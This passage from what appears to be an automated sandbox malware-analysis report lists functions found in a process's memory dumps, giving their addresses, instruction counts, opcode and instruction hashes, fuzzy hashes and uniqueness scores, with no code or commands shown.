                                          • Opcode Fuzzy Hash: 5d412eca7edee15a09968951f4fa110622fdf895569914304d5f4814eb68efe9
                                          • Instruction Fuzzy Hash: 54519520A093C04FD71A433899547997FA99F82208F19C5EBD1498F59BD73BDC1AC363
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116D90B, Relevance: .1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ed7332e9a2305dcccb779a5ec174c245221d45f2951edcdbc430faf4b573c13
                                          • Instruction ID: ca86d55a067bf9030a28c5b58784f34d79414ea766249b4e82d7fa7dd47bbbd6
                                          • Opcode Fuzzy Hash: 9ed7332e9a2305dcccb779a5ec174c245221d45f2951edcdbc430faf4b573c13
                                          • Instruction Fuzzy Hash: CC41C531B08249DFDF19CFE8D84479EBFBAAF45310F048555E995AB251D332E924CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01169A60, Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a93ad8e5a783f47a960e9f19d927188ded71fc119898c5866f909a763b519154
                                          • Instruction ID: 8fdc6bd0d41ed450aeb4bf510c4b0d95d8c294d8acbed72265062a5d731f03dd
                                          • Opcode Fuzzy Hash: a93ad8e5a783f47a960e9f19d927188ded71fc119898c5866f909a763b519154
                                          • Instruction Fuzzy Hash: DC31D430B002085FDB28DFA9C994B6EBBEAEB89254F55C83DD90ADB285D731EC118751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164E60, Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ee15ab520a8f05c06a4d95930ec6608ced632379cb405de6d6367d704ae4272
                                          • Instruction ID: 1b3556732361f70676bdf504df82a49d424729b82f2cdd2d7245a9b97f70ed70
                                          • Opcode Fuzzy Hash: 4ee15ab520a8f05c06a4d95930ec6608ced632379cb405de6d6367d704ae4272
                                          • Instruction Fuzzy Hash: 0A31A530E043088FCB49CBA8D9849DEBBFAEF85314F258569D504D7341D736E952CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DABD4C4, Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5630958707.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dcacee21dd567ae8422c993892eb7c55fb96b2bd2f3c65f5121968a396c10252
                                          • Instruction ID: ceeec1dd089ccda1022aa02a1363769e81edc8d553578e3b107ea82bddcd00e7
                                          • Opcode Fuzzy Hash: dcacee21dd567ae8422c993892eb7c55fb96b2bd2f3c65f5121968a396c10252
                                          • Instruction Fuzzy Hash: 7D21B075504240DFDF01DF58D980B16BF69FB88728F24CA69E90A0B256C376E456CBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DABD3D8, Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5630958707.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f00ad7bf539aaefe8d562cb5431c86fa49aa4cf84bcf83d479b5380e143f0cab
                                          • Instruction ID: 35d3b2dbcd93777857c7f7f3cbe0be9ede66d9ac2333f82f23592ca156c18cd4
                                          • Opcode Fuzzy Hash: f00ad7bf539aaefe8d562cb5431c86fa49aa4cf84bcf83d479b5380e143f0cab
                                          • Instruction Fuzzy Hash: 37210375504240DFDF01DF58D9C0B16BB69FB88324F20C9A9E90A0B206C33AE456CBE3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01165C30, Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c842fd397ce68786f183df7e96b7a934a72063815c46171de170a2ae16000556
                                          • Instruction ID: a0493c6af637b033ec42f4eacb28dcf8bff4c7ae7ff8f86dd5155ce8a62cd1f9
                                          • Opcode Fuzzy Hash: c842fd397ce68786f183df7e96b7a934a72063815c46171de170a2ae16000556
                                          • Instruction Fuzzy Hash: 0611E13070D3804FD74A43B8ED291557FAADB82148F05C9E6E049CF1A2DB3ADD168762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DACD01C, Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5631213877.000000001DACD000.00000040.00000001.sdmp, Offset: 1DACD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2eb49e1a58d3ca115c542b675bb4c5fd7469e1696d9651daf4c77259c42777bc
                                          • Instruction ID: b6e6b3e786f493166571191825f15d0450f0f43886a31ce8a21231a78837cb1b
                                          • Opcode Fuzzy Hash: 2eb49e1a58d3ca115c542b675bb4c5fd7469e1696d9651daf4c77259c42777bc
                                          • Instruction Fuzzy Hash: F721D075604340DFDF01DF6CD9C0B16BBA5FB88728F20C9A9D84A4B246C336D846CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DACD005, Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5631213877.000000001DACD000.00000040.00000001.sdmp, Offset: 1DACD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec748f4cd5444b2ef78c95cf277269fd6d2cab6a235a250096ea50e881bdc851
                                          • Instruction ID: 3a5d5f59f37963f948101a1f8276a74574eff2a3841a80364a076b8173c741fa
                                          • Opcode Fuzzy Hash: ec748f4cd5444b2ef78c95cf277269fd6d2cab6a235a250096ea50e881bdc851
                                          • Instruction Fuzzy Hash: 692184755087809FCB02CF28D994B15BF71EB46324F24C5EAD8494F257C33AD856CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DABD4BF, Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5630958707.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84221a41442e873146878cf504f43701bd0ebd9110174d0923f3103087651c74
                                          • Instruction ID: ab874c9f79aafae548f5e532ce3936a545469bef52656e8f7184dd2b51e2901e
                                          • Opcode Fuzzy Hash: 84221a41442e873146878cf504f43701bd0ebd9110174d0923f3103087651c74
                                          • Instruction Fuzzy Hash: 7E118E76904280DFCB02CF14D9C4B16BF71FB88324F24C6A9D94A4B656C37AD55ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DABD3D3, Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5630958707.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84221a41442e873146878cf504f43701bd0ebd9110174d0923f3103087651c74
                                          • Instruction ID: eadd85ede7226d86988f85b16742271741359f9035712cf64f4319c76693c2d8
                                          • Opcode Fuzzy Hash: 84221a41442e873146878cf504f43701bd0ebd9110174d0923f3103087651c74
                                          • Instruction Fuzzy Hash: 83118E76504281DFDB02CF14D9C4B16BF71FB88324F24C6A9D94A4B656C33AE45ACBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116D7AE, Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56fbf92f41fb08f7d44ae082e0d903621fcae66f43d0da44419784a83445720b
                                          • Instruction ID: d751fdb980072e8c7d85861764958af2227bc0f04d25e3948fa3772f972a4069
                                          • Opcode Fuzzy Hash: 56fbf92f41fb08f7d44ae082e0d903621fcae66f43d0da44419784a83445720b
                                          • Instruction Fuzzy Hash: BE01E571A042599FCF09CFD9D8048DEBBBAFF8D310F01812AE905AB214D7359A19CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01166550, Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5464ad41d448bdfebe9ac85cfb77213844e20b904dbaec7175e56d24c0fd6823
                                          • Instruction ID: f34911357b4abdc7b9beac4e28d020a49698013dc37e7cdbb269474211fd67cd
                                          • Opcode Fuzzy Hash: 5464ad41d448bdfebe9ac85cfb77213844e20b904dbaec7175e56d24c0fd6823
                                          • Instruction Fuzzy Hash: 21F0F471E043289FCB40EBB8881959F7EF5DF85260B050479D506D3240EB389912CBE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01166560, Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21172dee2c79ac1f6e58d830bd201e6619e3f8c6f6f95322d41584db0fcf4d04
                                          • Instruction ID: 51bfee48fb521ecae01a8c74b11f18fc185e03bb47a7275f87b6d0b1c97dabef
                                          • Opcode Fuzzy Hash: 21172dee2c79ac1f6e58d830bd201e6619e3f8c6f6f95322d41584db0fcf4d04
                                          • Instruction Fuzzy Hash: E7F08271F002398FCF44EBBD980869F7AF9AB881A4B010475D50AD3300EF348D1287E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164DD9, Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f6161064aa5db72ce9264771ae6aca93dfe3457fbd7828d6ff5f6fc9199d823
                                          • Instruction ID: 646af9e950243babb7ade9fb4f47c7b07878c1c8dedd3a584481ee5d392397b6
                                          • Opcode Fuzzy Hash: 6f6161064aa5db72ce9264771ae6aca93dfe3457fbd7828d6ff5f6fc9199d823
                                          • Instruction Fuzzy Hash: BCF0A071E042218FCB909FBD5C041AE7FF9DEC8621705867AE56AD3240DA3409128BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164DE8, Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0087a6ab19e928eb1f9e4767bb6bb3cf8637ba623eea256a6d640129510214c
                                          • Instruction ID: 2591e5df0d32dae80b993e1631b42d36f3dcc3207ec48c2077498c002b4fe662
                                          • Opcode Fuzzy Hash: f0087a6ab19e928eb1f9e4767bb6bb3cf8637ba623eea256a6d640129510214c
                                          • Instruction Fuzzy Hash: 20E04871E041259F8B54DFBD98045AFBFF8EACC261B014076E51DD3300EB3449118BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0116AE60, Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: XQm$XQm$XQm$XQm
                                          • API String ID: 0-2654478264
                                          • Opcode ID: a04b6b23bcaf5fe6a166ec54a609bffc1816d75a05df48a3c2deae5df5de734d
                                          • Instruction ID: 9e858f883ae9f6e5f4d82444e1a7bb0b1bc983e06c54e82b001bf43da09aa0e9
                                          • Opcode Fuzzy Hash: a04b6b23bcaf5fe6a166ec54a609bffc1816d75a05df48a3c2deae5df5de734d
                                          • Instruction Fuzzy Hash: 4D41D731E042298FEF698B6899503AEB6BAAFC5200F1444B5C50AE7395DB32CD558B93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116AE4F, Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: XQm$XQm$XQm$XQm
                                          • API String ID: 0-2654478264
                                          • Opcode ID: 6e5eb7a66f403dfc74ac9966a27e2e07691319d721eba35a44a46bdb833852a0
                                          • Instruction ID: 63bc5f760c2fb249eb27cca1533ac52f3a8c9b0da853e8737bf87a7a0c64207c
                                          • Opcode Fuzzy Hash: 6e5eb7a66f403dfc74ac9966a27e2e07691319d721eba35a44a46bdb833852a0
                                          • Instruction Fuzzy Hash: E5310770E042298BDF69CB6C98507AFB7F9AF95200F1045B9C50AE7281DB32CD518F83
                                          Uniqueness

                                          Uniqueness Score: -1.00%